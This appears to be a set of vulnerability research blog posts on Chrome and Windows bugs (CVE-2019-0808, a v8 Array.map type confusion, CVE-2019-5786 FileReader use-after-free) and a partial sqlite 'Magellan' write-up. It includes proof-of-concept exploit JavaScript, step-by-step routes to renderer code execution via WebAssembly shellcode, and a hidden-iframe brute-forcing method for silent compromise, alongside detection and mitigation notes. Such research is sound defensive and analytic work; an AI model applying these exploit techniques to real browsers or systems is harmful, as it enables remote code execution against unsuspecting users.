Demo Video
The following video demonstrates how this vulnerability was combined with István Kurucsai’s exploit for CVE-2019-5786 to form the fully working exploit chain described in Google’s blog post. Notice the attacker can spawn arbitrary commands as the SYSTEM user from Chrome despite the limitations of the Chrome sandbox.
Detection
Detection of exploitation attempts can be performed by examining user mode applications to see if they make any calls to CreateWindow() or CreateWindowEx() with an lpClassName parameter of “#32768”. Any user mode application which exhibits this behavior is likely malicious, since the class string “#32768” is reserved for system use, and should therefore be subject to further inspection.
Mitigation
Running Windows 8 or higher prevents attackers from exploiting this issue, since Windows 8 and later prevent applications from mapping the first 64 KB of memory (as mentioned on slide 33 of Matt Miller’s 2012 BlackHat slide deck), which means attackers can’t allocate the NULL page or memory near it, such as 0x30. Additionally, upgrading to Windows 8 or higher allows Chrome’s sandbox to block all calls to win32k.sys, thereby preventing the attacker from calling NtUserMNDragOver() to trigger this vulnerability.
On Windows 7, the only possible mitigation is to apply KB4489878 or KB4489885, which can be downloaded from the links in the CVE-2019-0808 advisory page.
Conclusion
Developing a Chrome sandbox escape requires a number of conditions to be met. However, by combining the right exploit with the limited mitigations of Windows 7, it was possible to build a working sandbox escape from a bug in win32k.sys, illustrating the 0day exploit chain originally described in Google’s blog post.
The timely and detailed analysis of vulnerabilities is one of the benefits of an Exodus nDay Subscription. This subscription also allows offensive groups to test mitigating controls and detection and response functions within their organisations. Corporate SOC/NOC groups also make use of our nDay Subscription to keep watch on critical assets.
This post explores the possibility of developing a working exploit for a vulnerability already patched in the v8 source tree before the fix makes it into a stable Chrome release.
Author: István Kurucsai
Chrome Release Schedule
Chrome has a relatively tight release cycle of pushing a new stable version every 6 weeks with stable refreshes in between if warranted by critical issues. As a result of its open-source development model, while security fixes are immediately visible in the source tree, they need time to be tested in the non-stable release channels of Chrome before they can be pushed out via the auto-update mechanism as part of a stable release to most of the user-base.
In effect, there’s a window of opportunity for attackers, ranging from a couple of days to weeks, in which the vulnerability details are practically public, yet most users remain vulnerable and cannot obtain a patch.
Open Source Patch Analysis
Looking through the git log of v8 can be an overwhelming experience. One change, however, immediately caught my attention. The fix has the following commit message:
[TurboFan] Array.prototype.map wrong ElementsKind for output array.
The associated chromium issue tracker entry is restricted and likely to remain so for months. However, it has all the ingredients that might allow an attacker to produce an exploit quickly, which is the ultimate goal here: TurboFan is the optimizing JIT compiler of v8, which has become a hot target recently. Array vulnerabilities are always promising and this one hints at a type confusion between element kinds, which can be relatively straightforward to exploit. The patch also includes a regression test that effectively triggers the vulnerability, which can also help shorten exploit development time.
The only modified method is JSCallReducer::ReduceArrayMap in src/compiler/js-call-reducer.cc:
+    // If the array length >= kMaxFastArrayLength, then CreateArray
+    // will create a dictionary. We should deopt in this case, and make sure
+    // not to attempt inlining again.
+    original_length = effect = graph()->NewNode(
+        simplified()->CheckBounds(p.feedback()), original_length,
+        jsgraph()->Constant(JSArray::kMaxFastArrayLength), effect, control);
+
     // Even though {JSCreateArray} is not marked as {kNoThrow}, we can elide the
     // exceptional projections because it cannot throw with the given parameters.
     Node* a = control = effect = graph()->NewNode(
         javascript()->CreateArray(1, MaybeHandle<AllocationSite>()),
         array_constructor, array_constructor, original_length, context,
         outer_frame_state, effect, control);
JSCallReducer runs during the InliningPhase of TurboFan; its ReduceArrayMap method attempts to replace calls to Array.prototype.map with inlined code. The comments are descriptive: the added lines insert a check to verify that the length of the array is below kMaxFastArrayLength (32 * 1024 * 1024 elements). This length is passed to CreateArray, which returns a new array.
The v8 engine has different optimizations for the storage of arrays that have specific characteristics. For example, PACKED_DOUBLE_ELEMENTS is the elements kind used for arrays that only have double elements and no holes. These are stored as a contiguous array in memory and allow for efficient code generation for operations like map. Confusion between the different element kinds is a common source of security vulnerabilities.
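The packed/holey distinction that v8 tracks internally corresponds to a script-visible difference worth illustrating. The element-kind names in the comments below are v8-internal labels, not part of the JavaScript language, so this is just a plain-JS sketch of what the engine specializes on:

```javascript
// A hole is an index that was never assigned a value. The `in` operator
// makes the difference between a packed and a holey array observable
// from script, even though the element kinds themselves are internal.
const packed = [1.1, 2.2, 3.3]; // tracked by v8 as PACKED_DOUBLE_ELEMENTS
const holey = [1.1, , 3.3];     // tracked by v8 as HOLEY_DOUBLE_ELEMENTS

const packedHasIndex1 = 1 in packed; // true: index 1 holds 2.2
const holeyHasIndex1 = 1 in holey;   // false: index 1 is a hole
```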
So why is it a problem if the length is above kMaxFastArrayLength? Because CreateArray will return an array with a dictionary element kind for such lengths. Dictionaries are used for large and sparse arrays and are basically hash tables. However, by feeding it the right type feedback, TurboFan will try to generate optimized code for contiguous arrays. This is a common property of many JIT compiler vulnerabilities: the compiler makes an optimization based on type feedback but a corner case allows an attacker to break the assumption during runtime of the generated code.
Since the dictionary and contiguous element kinds have vastly different backing storage mechanisms, this allows for memory corruption. In effect, the output array will be a small (considering its size in memory, not its length property) dictionary that will be accessed by the optimized code as if it was a large (again, considering its size in memory) contiguous region.
Looking at the regression test included in the fix: it feeds the mapping function with type feedback for an array with contiguous storage, then, once the function has been optimized by TurboFan, invokes it with an array that is large enough that the output of map ends up with dictionary element kind.
// Copyright 2019 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

// Set up a fast holey smi array, and generate optimized code.
let a = [1, 2, , , , 3];
function mapping(a) { return a.map(v => v); }
mapping(a);
mapping(a);
%OptimizeFunctionOnNextCall(mapping);
mapping(a);

// Now lengthen the array, but ensure that it points to a non-dictionary
// backing store.
a.length = (32 * 1024 * 1024) - 1;
a.fill(1, 0);
a.push(2);
a.length += 500;

// Now, the non-inlined array constructor should produce an array with
// dictionary elements: causing a crash.
mapping(a);
Exploitation
Since the map operation will write ~32 million elements out-of-bounds to the output array, the regression test essentially triggers a wild memcpy. To make exploitation possible, the loop of map needs to be stopped. This is possible by providing a callback function that raises an exception after the desired number of iterations. Another issue is that it overwrites everything linearly without skips, while ideally we would like to only selectively overwrite a single value at a specific offset, e.g. the length property of an adjacent array. Reading through the documentation of Array.prototype.map, the following can be seen:
map calls a provided callback function once for each element in an array, in order, and constructs a new array from the results. callback is invoked only for indexes of the array which have assigned values, including undefined. It is not called for missing elements of the array (that is, indexes that have never been set, which have been deleted or which have never been assigned a value).
So unset elements (holes) are skipped and map writes nothing to the output array for those indexes. The PoC code below utilizes both of these behaviors to overwrite the length of an array adjacent to the map output array.
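Both behaviors can be demonstrated in plain JavaScript; the sketch below (illustrative only, not part of the PoC) shows that a hole produces no callback invocation and that a thrown exception ends the map loop early:

```javascript
// map invokes the callback only for assigned indexes, and an exception
// thrown from the callback aborts the remaining iterations.
const input = [0, , 2, 3, 4]; // index 1 is a hole

const visited = [];
try {
  input.map((v, idx) => {
    if (idx > 2) throw "stop"; // stop the loop once index 2 is done
    visited.push(idx);
    return v;
  });
} catch (e) {
  // the "stop" exception aborted the map loop at index 3
}
// The callback ran only for indexes 0 and 2: the hole at index 1 was
// skipped and the throw ended the iteration before indexes 3 and 4.
```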
// This call ensures that TurboFan won't inline array constructors.
Array(2**30);

// We are aiming for the following object layout:
// [output of Array.map][packed float array]
// First the length of the packed float array is corrupted via the original
// vulnerability.

// offset of the length field of the float array from the map output
const float_array_len_offset = 23;

// Set up a fast holey smi array, and generate optimized code.
let a = [1, 2, , , , 3];
var float_array;

function mapping(a) {
  function cb(elem, idx) {
    if (idx == 0) {
      float_array = [0.1, 0.2];
    }
    if (idx > float_array_len_offset) {
      // minimize the corruption for stability
      throw "stop";
    }
    return idx;
  }
  return a.map(cb);
}

mapping(a);
mapping(a);
%OptimizeFunctionOnNextCall(mapping);
mapping(a);

// Now lengthen the array, but ensure that it points to a non-dictionary
// backing store.
a.length = (32 * 1024 * 1024) - 1;
a.fill(1, float_array_len_offset, float_array_len_offset + 1);
a.fill(1, float_array_len_offset + 2);
a.push(2);
a.length += 500;

// Now, the non-inlined array constructor should produce an array with
// dictionary elements: causing a crash.
cnt = 1;
try {
  mapping(a);
} catch (e) {
  console.log(float_array.length);
  console.log(float_array[3]);
}
At this point, we have a float array that can be used for out-of-bounds reads and writes. The exploit aims for the following object layout on the heap to capitalize on this:
[output of Array.map][packed float array][typed array][obj]
The corrupted float array is used to modify the backing store pointer of the typed array, thus achieving arbitrary read/write. obj at the end is used to leak the address of arbitrary objects by setting them as inline properties on it, then reading their address back through the float array. From then on, the exploit follows the steps described in my previous post to achieve arbitrary code execution: creating an RWX page via WebAssembly, traversing the JSFunction object hierarchy to find it in memory, and placing the shellcode there.
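Values read back through the corrupted float array arrive as IEEE-754 doubles, so exploits of this style typically carry a pair of bit-conversion helpers backed by a shared buffer. A minimal sketch (the ftoi/itof names are conventional, not taken from the exploit code itself):

```javascript
// A Float64Array and a BigUint64Array share the same 8-byte buffer,
// so writing through one view and reading through the other
// reinterprets the raw bits with no numeric conversion.
const conv = new ArrayBuffer(8);
const f64 = new Float64Array(conv);
const u64 = new BigUint64Array(conv);

function ftoi(val) { // double -> 64-bit integer bit pattern
  f64[0] = val;
  return u64[0];
}

function itof(val) { // 64-bit integer bit pattern -> double
  u64[0] = val;
  return f64[0];
}
```

A pointer leaked through the float array as a double can then be turned into an integer address with ftoi, and a crafted address turned back into a double for writing with itof.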
The full exploit code which works on the latest stable version (v73.0.3683.86 as of 3rd April 2019) can be found on our github and it can be seen in action below. It’s quite reliable and could also be integrated with a Site-Isolation based brute-forcer, as discussed in our previous blog posts. Note that a sandbox escape would be needed for a complete chain.
Detection
The exploit doesn’t rely on any uncommon features or cause unusual behavior in the renderer process, which makes distinguishing between malicious and benign code difficult without false positive results.
Mitigation
Disabling JavaScript execution via the Settings / Advanced settings / Privacy and security / Content settings menu provides effective mitigation against the vulnerability.
Conclusion
The idea of developing exploits for 1day vulnerabilities before the fix becomes available isn’t new and the issue is definitely not unique to Chrome. Even though exploits developed for such vulnerabilities have a short lifespan, malicious actors may take advantage of them, as they avoid the risk of burning 0days. Keeping up-to-date on patches/updates from a vendor or relying on public advisories isn’t good enough. One needs to dig deep into a patch to know if it applies to an exploitable security vulnerability.
The timely analysis of these 1day vulnerabilities is one of the key differentiators of our Exodus nDay Subscription. It enables our customers to ensure their defensive measures have been implemented properly even in the absence of a proper patch from the vendor.
This post provides detailed analysis and an exploit achieving remote code execution for the recently fixed Chrome vulnerability that was observed by Google to be exploited in the wild.
Author: István Kurucsai
Patch Analysis
The release notes from Google are short on information as usual:
[$N/A][936448] High CVE-2019-5786: Use-after-free in FileReader. Reported by Clement Lecigne of Google’s Threat Analysis Group on 2019-02-27
As described on MDN, the “FileReader object lets web applications asynchronously read the contents of files (or raw data buffers) stored on the user’s computer, using File or Blob objects to specify the file or data to read”. It can be used to read the contents of files selected in a file open dialog by the user or Blobs created by script code. An example usage is shown below.
let reader = new FileReader();
reader.onloadend = function(evt) {
  console.log(`contents as an ArrayBuffer: ${evt.target.result}`);
}
reader.onprogress = function(evt) {
  console.log(`read ${evt.target.result.byteLength} bytes so far`);
}
let contents = "filecontents";
f = new File([contents], "a.txt");
reader.readAsArrayBuffer(f);
It is important to note that the File or Blob contents are read asynchronously and the user JS code is notified of the progress via callbacks. The onprogress event may be fired multiple times while the reading is in progress, giving access to the contents read so far. The onloadend event is triggered once the operation is completed, either in success or failure.
Searching for the issue number in the Chromium git logs quickly reveals the patch for the vulnerability, which alters a single function. The original, vulnerable version is shown below.
This function gets called each time the result property is accessed in a callback after a FileReader.readAsArrayBuffer call in JavaScript.
While the object hierarchy around the C++ implementation of ArrayBuffers is relatively complicated, the important pieces are described below. Note that the C++ namespaces of the different classes are included so that distinguishing between objects implemented in Chromium (the WTF and blink namespaces) and v8 (everything under the v8 namespace) is easier.
WTF::ArrayBuffer: the embedder-side (Chromium) implementation of the ArrayBuffer concept. WTF::ArrayBuffer objects are reference counted and contain the raw pointer to their underlying memory buffer, which is freed when the reference count of an ArrayBuffer reaches 0.
blink::DOMArrayBufferBase: a garbage collected class containing a smart pointer to a WTF::ArrayBuffer.
blink::DOMArrayBuffer: class inheriting from blink::DOMArrayBufferBase, describing an ArrayBuffer in Chromium. Represented in the JavaScript engine by a v8::internal::JSArrayBuffer instance.
WTF::ArrayBufferBuilder: helper class to construct a WTF::ArrayBuffer incrementally. Holds a smart pointer to the ArrayBuffer.
blink::FileReaderLoader: responsible for loading the File or Blob contents. Uses WTF::ArrayBufferBuilder to build the ArrayBuffer as the data is read.
Comparing the code to the fixed version shown below, the most important difference is that if loading is not finished, the patched version creates new ArrayBuffer objects using the ArrayBuffer::Create function, while the vulnerable version simply passes on a reference to the existing ArrayBuffer to the DOMArrayBuffer::Create function. ToArrayBuffer always returns the actual state of the ArrayBuffer being built, but since the reading is asynchronous, it may return the same one under some circumstances.
What are those circumstances? The raw_data_ variable in the code is of the type ArrayBufferBuilder, which is used to construct the result ArrayBuffer from the incrementally read data by dynamically allocating larger and larger underlying ArrayBuffers as needed. The ToArrayBuffer method returns a smart pointer to this underlying ArrayBuffer if the contents read so far fully occupy the currently allocated buffer and creates a new one via slicing if the buffer is not fully used yet.
One way to abuse the multiple references to the same ArrayBuffer is to detach the ArrayBuffer through one and use the other, now dangling, reference. The JavaScript postMessage() method can be used to send messages to a JS Worker. It also has an additional parameter, transfer, which is an array of Transferable objects whose ownership is transferred to the Worker.
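The script-visible half of this, an ArrayBuffer being neutered by a transfer, can be reproduced without a Worker via structuredClone, which accepts the same transfer list as postMessage (available in modern browsers and Node.js 17+). A minimal sketch:

```javascript
// Transferring an ArrayBuffer detaches (neuters) the original object:
// ownership of the underlying memory moves to the receiving side and
// the source is left as a zero-length, unusable buffer.
const ab = new ArrayBuffer(16);
const lengthBefore = ab.byteLength; // 16

const received = structuredClone(ab, { transfer: [ab] });

const lengthAfter = ab.byteLength;          // 0: the original is detached
const receivedLength = received.byteLength; // 16: the memory moved here
```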
The transfer is done by the blink::SerializedScriptValue::TransferArrayBufferContents function, which iterates over the DOMArrayBuffers provided in the transfer parameter to postMessage and invokes the Transfer method of each, as shown below. blink::DOMArrayBuffer::Transfer calls into WTF::ArrayBuffer::Transfer, which transfers the ownership of the underlying data buffer.
The vulnerability can be triggered by passing multiple blink::DOMArrayBuffers that reference the same underlying ArrayBuffer to postMessage. Transferring the first will take ownership of its buffer, then the transfer of the second will fail because its underlying ArrayBuffer has already been neutered. This causes blink::SerializedScriptValue::TransferArrayBufferContents to enter an error path, freeing the already transferred ArrayBuffer but leaving a dangling reference to it in the second blink::DOMArrayBuffer, which can then be used to access the freed memory through JavaScript.
SerializedScriptValue::TransferArrayBufferContents(
...
  for (auto* it = array_buffers.begin(); it != array_buffers.end(); ++it) {
    DOMArrayBufferBase* array_buffer_base = *it;
    if (visited.Contains(array_buffer_base))
      continue;
    visited.insert(array_buffer_base);
    wtf_size_t index =
        static_cast<wtf_size_t>(std::distance(array_buffers.begin(), it));
...
    DOMArrayBuffer* array_buffer =
        static_cast<DOMArrayBuffer*>(array_buffer_base);
    if (!array_buffer->Transfer(isolate, contents.at(index))) {
      exception_state.ThrowDOMException(
          DOMExceptionCode::kDataCloneError,
          "ArrayBuffer at index " + String::Number(index) +
              " could not be transferred.");
      return ArrayBufferContentsArray();
    }
  }
Exploitation
The vulnerability can be turned into an arbitrary read/write primitive by reclaiming the memory region pointed to by the dangling pointer with JavaScript TypedArrays and corrupting their length and backing store pointers. This can then be further utilized to achieve arbitrary code execution in the renderer process.
Memory Management in Chrome
There are several aspects of memory management in Chrome that affect the reliability of the vulnerability. Chrome uses PartitionAlloc to allocate the backing store of ArrayBuffers. This effectively separates ArrayBuffer backing stores from other kinds of allocations, making the vulnerability unexploitable if the region that is freed is below 2MiB in size because PartitionAlloc will never reuse those allocations for other kinds of data. If the backing store size is above 2MiB, it is placed in a directly mapped region. Once freed, other kinds of allocations can reuse such a region. However, successfully reclaiming the freed region is only possible on 32-bit platforms, as PartitionAlloc adds additional randomness to its allocations via VirtualAlloc and mmap address hinting on 64-bit platforms beside their ASLR slides.
On a 32-bit Windows 7 install, the address space of a fresh Chrome process is similar to the one shown below. Note that these addresses are not static and will differ by the ASLR slide of Windows. Bottom-up allocations start from the lower end of the address space, the last one is the reserved region starting at 36681000. Windows heaps, PartitionAlloc regions, garbage collected heaps of v8 and Chrome, thread stacks are all placed among these regions in a bottom-up fashion. The backing store of the vulnerable ArrayBuffer will also reside here. An important thing to note is that Chrome makes a 512MiB reserved allocation (from 4600000 on the listing below) early on. This is done because the address space on x86 Windows systems is tight and gets fragmented quickly, therefore Chrome makes an early reservation to be able to hand it out for large contiguous allocations, like ArrayBuffers, if needed. Once an ArrayBuffer allocation fails, Chrome frees this reserved region and tries again. The logic that handles this could complicate exploitation, so the exploit starts out by attempting a large (1GiB) ArrayBuffer allocation. This will cause Chrome to free the reserved region, then fail to allocate again, since the address space cannot have a gap of the requested size. While most OOM conditions kill the renderer process, ArrayBuffer allocation failures are recoverable from JavaScript via exception handling.
Another important factor is the non-deterministic nature of the multiple garbage collectors that are involved in the managed heaps of Chrome. This introduces noise in the address space that is hard to control from JavaScript. Since the onprogress events used to trigger the vulnerability are also fired a non-deterministic number of times, and each event causes an allocation, the final location of the vulnerable ArrayBuffer is uncontrollable without the ability to trigger garbage collections on demand from JavaScript. The exploit uses the code shown below to invoke garbage collection. This makes it possible to free the results of onprogress events continuously, which helps in avoiding out-of-memory kills of the renderer process and also forces the dangling pointer created upon triggering the vulnerability to point to the lower end of the address space, somewhere into the beginning of the original 512MiB reserved region.
function force_gc() {
  // forces a garbage collection to avoid OOM kills and help with heap non-determinism
  try {
    var failure = new WebAssembly.Memory({initial: 32767});
  } catch (e) {
    // console.log(e.message);
  }
}
Exploitation steps
The exploit achieves code execution by the following steps:
Allocate a large (128MiB) string that will be used as the source of the Blob passed to FileReader. This allocation will end up in the free region following the bottom-up allocations (from 36690000 in the address space listing above).
Free the 512MiB reserved region via an oversized ArrayBuffer allocation, as discussed previously.
Invoke FileReader.readAsArrayBuffer. A number of onprogress events will be triggered, the last couple of which can return references to the same underlying ArrayBuffer if the timing of the events is right. This step can be repeated indefinitely until successful without crashing the process.
Free the backing store of the ArrayBuffer through one of the references. Going forward, another reference can be used to access the dangling pointer.
Reclaim the freed region by spraying the heap with recognizable JavaScript objects, interspersed with TypedArrays.
Look for the recognizable pattern through the dangling reference. This enables leaking the address of arbitrary objects by setting them as properties on the found object, then reading back the property value through the dangling pointer.
Corrupt the backing store of a sprayed TypedArray and use it to achieve arbitrary read/write access to the address space.
Load a WebAssembly module. This maps a read-write-executable memory region of 64KiB into the address space.
Traverse the JSFunction object hierarchy of an exported function from the WebAssembly module using the arbitrary read/write primitive to find the address of the read-write-executable region.
Replace the code of the WebAssembly function with shellcode and execute it by invoking the function.
Increasing reliability
A single run of the exploit (which uses the steps detailed above) yields a success rate of about 25%, but a simple trick turns that into effectively 100% reliability. Abusing the site isolation feature of Chrome enables brute-forcing, as described in another post on this blog by Ki Chan Ahn (look for the section titled “Making a Stealth Exploit by abusing Chrome’s Site Isolation”). A site corresponds to a (scheme, host) tuple, so hosting the brute-forcing wrapper script on one site while it loads the exploit repeatedly in an iframe from another host causes a new process to be created for each exploit attempt. These iframes can be hidden from the user, resulting in a silent compromise. Using multiple sites to host the exploit code, the process can be parallelized (subject to memory and site-isolation process limits). The exploit uses a conservative timeout of 10 seconds per iteration without parallelization, and achieves code execution in under half a minute on average.
The entire exploit code can be found on our github and it can be seen in action below.
Detection
The exploit doesn’t rely on any uncommon features or cause unusual behavior in the renderer process, which makes distinguishing between malicious and benign code difficult without false positive results.
Mitigation
Disabling JavaScript execution via the Settings / Advanced settings / Privacy and security / Content settings menu provides effective mitigation against the vulnerability.
Conclusion
It’s interesting to see exploits in the wild still targeting older platforms like Windows 7 x86. The 32-bit address space is so crowded that additional randomization is disabled in PartitionAlloc, and win32k lockdown is only available starting with Windows 8. The lack of mitigations on Windows 7 that are present in later versions of Windows therefore makes it a relatively soft target for exploitation.
Subscribers of our N-Day feed can leverage our in-depth analysis of critical vulnerabilities to defend themselves better, or use the provided exploits during internal penetration tests.
In December 2018, the Tencent Blade Team released an advisory for a bug they named “Magellan”, which affected all applications using sqlite versions prior to 3.25.3. In their public disclosure they stated that they had successfully exploited Google Home using this vulnerability. Despite several weeks having passed since the initial advisory, no public exploit was released. We were curious how exploitable the bug was and whether it could be exploited on 64-bit desktop platforms. Therefore, we set out to create an exploit targeting Chrome on 64-bit Ubuntu.
Background
The Magellan bug lies in the fts3 (Full Text Search) extension of the sqlite database library, which was added in 2007. Chrome started to support the WebSQL standard (now deprecated) in 2010, so all versions between 2010 and the patched version should be vulnerable. The bug triggers when running a specific sequence of SQL queries, so only applications that allow executing arbitrary SQL queries are vulnerable.
A short glance at the Vulnerability
In order to exploit a bug, the vulnerability has to be studied in detail. The bug was patched in commit 940f2adc8541a838. Looking at the commit, there were actually 3 bugs. We will look at the patch in the “fts3SegReaderNext” function, which contains the bug that was actually used during exploitation. The other two bugs are very similar in nature, just slightly more complicated to trigger.
The gist of the patch is summarized below, with the bottom snippet being the patched version.
static int fts3SegReaderNext(
  Fts3Table *p,
  Fts3SegReader *pReader,
  int bIncr
){
  int rc;                  /* Return code of various sub-routines */
  char *pNext;             /* Cursor variable */
  int nPrefix;             /* Number of bytes in term prefix */
  int nSuffix;             /* Number of bytes in term suffix */

static int fts3SegReaderNext(
  Fts3Table *p,
  Fts3SegReader *pReader,
  int bIncr
){
  int rc;                  /* Return code of various sub-routines */
  char *pNext;             /* Cursor variable */
  int nPrefix;             /* Number of bytes in term prefix */
  int nSuffix;             /* Number of bytes in term suffix */
  /* Both nPrefix and nSuffix were read by fts3GetVarint32() and so are
  ** between 0 and 0x7FFFFFFF. But the sum of the two may cause integer
  ** overflow - hence the (i64) casts. */
  if( (i64)nPrefix+nSuffix>(i64)pReader->nTermAlloc ){
    i64 nNew = ((i64)nPrefix+nSuffix)*2;
    char *zNew = sqlite3_realloc64(pReader->zTerm, nNew);
    if( !zNew ){
      return SQLITE_NOMEM;
    }
    pReader->zTerm = zNew;
    pReader->nTermAlloc = nNew;
  }
The patched version explicitly casts nPrefix and nSuffix to i64 because both are declared as int, and the check on the highlighted line can be bypassed if the addition of the two values overflows. With the explicit casts, the check is assessed correctly, and the allocation size on the following line is also calculated correctly. This new allocation is placed in pReader->zTerm and is later used on line 38 in a memcpy operation.
Going back to the version before the patch, there is no explicit cast as seen on line 21, and therefore, if the sum of the two values is larger than 2^31, the result will be negative and the inner code block will not be executed. This means the code does not allocate a new block that is big enough for the memcpy operation below. This has several implications, but to fully understand what the bug gives us, it is necessary to understand some core concepts of sqlite.
SQLite Internals
SQLite is a C-language library that implements a small, fast, self-contained SQL database engine, which claims to be the most used database engine in the world. SQLite implements most of the core SQL features, as well as some features unique to SQLite. This blog post will not go into every detail of the database engine, but rather brush over the concepts that are relevant to the exploit.
SQLite Architecture
This is a summary of the Architecture of SQLite page on the official sqlite homepage. SQLite is built around a small virtual machine: the code generator emits bytecode that later gets executed by the engine, just like an interpreter in a javascript engine would. As such, it consists of a Tokenizer, Parser, Code Generator, and a Bytecode Engine. Every SQL query that is executed has to go through this pipeline. From an exploit developer’s point of view, this means that if a bug occurs in the Bytecode Engine phase, there will be massive heap noise coming from the previous 3 stages, which has to be dealt with during Heap Feng-shui.
Another notable thing about SQLite is its use of B-Trees. SQLite uses B-Tree data structures to implement efficient, fast searches on the values in the database. One thing to keep in mind is that the actual data of the B-Trees is kept on disk, not in memory. This is a logical decision, because some databases can get very large, and keeping all the data in memory would incur a large memory overhead. However, performing every search of a query on-disk would introduce a huge disk IO overhead, and hence, SQLite uses something called a Page Cache. The Page Cache is responsible for placing recently queried database data pages in memory, so that they can be re-used if another query searches for data on the same set of pages. The SQLite engine manages which pages are mapped into and out of memory, so disk and memory overhead are well balanced. From an exploit developer’s point of view, this means that most objects created during a single query execution are destroyed after the Bytecode Engine is done with the query, and the only thing that remains in-memory is the data in the Page Cache. The actual data values living in the database tables are therefore not a good target for Heap Feng-Shui, because most of the objects that represent the table data are thrown away immediately after query execution. In addition, the actual table data will only lie somewhere in the middle of the Page Cache, which is just slabs of multiple pages holding parts of the database file saved on disk.
Full Text Search extensions
A brief introduction
The SQLite homepage describes Full-Text Search as the following.
FTS3 and FTS4 are SQLite virtual table modules that allows users to perform full-text searches on a set of documents. The most common (and effective) way to describe full-text searches is “what Google, Yahoo, and Bing do with documents placed on the World Wide Web”. Users input a term, or series of terms, perhaps connected by a binary operator or grouped together into a phrase, and the full-text query system finds the set of documents that best matches those terms considering the operators and groupings the user has specified.
Basically, Full-Text Search (FTS) is an extension to SQLite that enables it to query for search terms, Google-style, in an efficient way. The architecture and internals of the Full-Text Search engine are thoroughly described on the respective webpage. SQLite has continuously upgraded its FTS engine, from fts1 to fts5. The vulnerability occurs in the 3rd version of the extension, fts3. This specific version is also the only version that is allowed to be used in Chrome; all requests to use the other 4 versions are rejected by Chrome. Therefore, it is important to understand some main concepts behind fts3.
Here is a small example of how to create an fts3 table.
CREATE VIRTUAL TABLE mail USING fts3(subject, body);
This will create an fts table that uses the Full-Text Search version 3 extension. While only one table, mail, is visible to the user, under the hood three more tables are created. Some of these tables will be discussed in detail in the following sections. During an INSERT statement, the VALUEs will be split into tokens, and each token will have an index associated with it and be inserted into its respective table. During a SELECT statement, the search keyword will be looked up in the indexed token tables, and if the keyword matches, the corresponding rows of the mail table will be returned. This was a brief summary of how full text search works under the hood. Now it is time to dig a little deeper into the elements that are related to the exploit.
Shadow Tables
In SQLite, there is something called Shadow Tables, which are basically just regular tables that exist to support the Virtual Table operations. These tables are created under the hood when issuing the CREATE VIRTUAL TABLE statement, and they store either the user INSERT’d data, or supplementary data that’s automatically inserted by the Virtual Table implementation. Since they are basically just regular tables, the content is accessible and modifiable just like any other table. An example of how the shadow tables are created is shown below.
sqlite> CREATE VIRTUAL TABLE mail USING fts3(subject, body);
sqlite> INSERT INTO mail(subject, body) VALUES('sample subject1','sample content');
sqlite> INSERT INTO mail(subject, body) VALUES('sample subject2','hello world');
sqlite> SELECT name FROM sqlite_master WHERE type='table';
mail
mail_content
mail_segments
mail_segdir
For instance, when a user issues an INSERT/UPDATE/DELETE statement on an fts3 table, the virtual table implementation modifies the rows of the underlying shadow tables, not the original table mail that was named in the CREATE VIRTUAL TABLE statement. This is because when the user issues an INSERT statement, the entire content of the value has to be split into tokens, and all those tokens and indexes need to be stored individually, not by the query issued by the user but by the C code implementation of fts3. These tokens and indexes aren’t stored as-is, but in a custom format defined by fts3 in order to pack all the values as compactly as possible. In the fts3 case, the token (or term) and the index are stored inside the tablename_segments and tablename_segdir shadow tables, with tablename replaced by the actual table name the user specified in the CREATE VIRTUAL TABLE statement. The entire sentence before it was split ('sample subject1', 'sample content' in the above query) is stored in the tablename_content shadow table. The remaining two shadow tables, tablename_stat and tablename_docsize, are support tables related to statistics and the total count of indexes and terms; these two are only created when using the fts4 extension. The most important table in this article is the tablename_segdir table, which will be used to trigger the vulnerability later on.
Variable Length Format
In the fts3 virtual table module, the shadow tables store some data as SQLite supported data types; everything else is joined into one giant chunk of data and stored in a compact form as a BLOB. One such example is the table below.
CREATE TABLE %_segdir(
  level INTEGER,
  idx INTEGER,
  start_block INTEGER,        -- Blockid of first node in %_segments
  leaves_end_block INTEGER,   -- Blockid of last leaf node in %_segments
  end_block INTEGER,          -- Blockid of last node in %_segments
  root BLOB,                  -- B-tree root node
  PRIMARY KEY(level, idx)
);
Some values are stored as INTEGER values, but the root column is stored as a BLOB. As mentioned before, the values are stored in a compact format in order to save space. STRING values are stored as-is, preceded by a length value. But then, how is the length value itself stored? SQLite uses a format it terms the fts Variable Length Format. The algorithm works as follows.
1. Represent the integer value in bits.
2. Split the integer value into groups of 7 bits.
3. Take the current lowest 7 bits. If it is not the last (most significant) group of 7 bits, add a 1 as the most significant bit to form a full 8-bit value.
4. Repeat step 3 for each of the following 7-bit groups.
5. If it is the last (most significant) group of 7 bits, add a 0 as the most significant bit to form a full 8-bit value.
6. Append all of the bytes created in steps 3 and 5 to form one long byte string; that is the resulting Variable Length Integer.
SQLite uses this format because it wants to use exactly as many bytes as are needed to store the integer; it doesn’t want to pad with additional 0’s that take up extra space, as would happen if the integer were saved in a fixed-width format such as the standard C types. This format is something to keep in mind when constructing the payload in a later phase of exploitation.
Segment B-Tree Format
The Segment B-Tree is a B-Tree that is tailored to serve for the fts extension’s needs. Since it is a complex format, only the elements related to the vulnerability will be discussed.
These are the fields in the tablename_segdir table. It stores most of the token and index data, and the most important field is the root member. We will focus on this member in detail.
The B-Tree consists of tree nodes and node data. A node can be an interior node, or a leaf. For simplicity’s sake, we will assume that the B-Tree has only a single node, and that node is the root node as well as a leaf node. The format of a leaf node is as follows.
Here is a quote borrowed from the SQLite webpage.
The first term stored on each node (“Term 1” in the figure above) is stored verbatim. Each subsequent term is prefix-compressed with respect to its predecessor. Terms are stored within a page in sorted (memcmp) order.
To give an example, in accordance with the above picture, let’s say Term 1 is apple. The Length of Term 1 is 5, and the content of Term 1 is apple. Doclist 1 follows the format of a Doclist, which is described here. Doclists are essentially just arrays of VarInt values, but they are not important for the discussion of the exploit and will hence be skipped. Let’s say Term 2 is april: the Prefix Length of Term 2 will be 2 (the “ap” shared with apple), the Suffix Length of Term 2 will be 3, and the Suffix Content of Term 2 is ril. As a last example, take Term 3 to be applepie: since it shares only the prefix “ap” with its predecessor april, its Prefix Length, Suffix Length, and Suffix Content will be 2, 6, and plepie respectively. This might seem a little messy in text, so the following is an illustration of the entire BLOB that was just described.
